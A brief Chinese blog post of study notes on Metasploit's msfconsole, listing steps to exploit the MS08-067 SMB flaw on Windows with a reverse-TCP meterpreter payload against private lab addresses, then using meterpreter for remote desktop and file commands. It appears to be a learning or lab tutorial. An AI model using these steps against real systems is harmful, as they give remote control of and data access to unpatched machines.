美文网首页
msfconsole

msfconsole

作者: 笑忘书v | 来源:发表于2017-03-13 23:48 被阅读0次

Exploit 模块 --》漏洞利用

payloads  --》shellcode  漏洞利用后执行的代码

use exploit --》选择漏洞利用模块

1.msfconsole 启动

2.use exploit/windows/smb/ms08_067_netapi 使用漏洞

3.show options  查看需要填写的参数 set RHOST 192.168.1.2

4.set payload windows/meterpreter/reverse_tcp 执行代码

5.show options   set LHOST 192.168.1.4

6.执行


远程桌面:run vnc

文件管理:download wdit cat mkdir mv updsate rm rmdir

相关文章

网友评论

      本文标题:msfconsole

      本文链接:https://www.haomeiwen.com/subject/kqxlwttx.html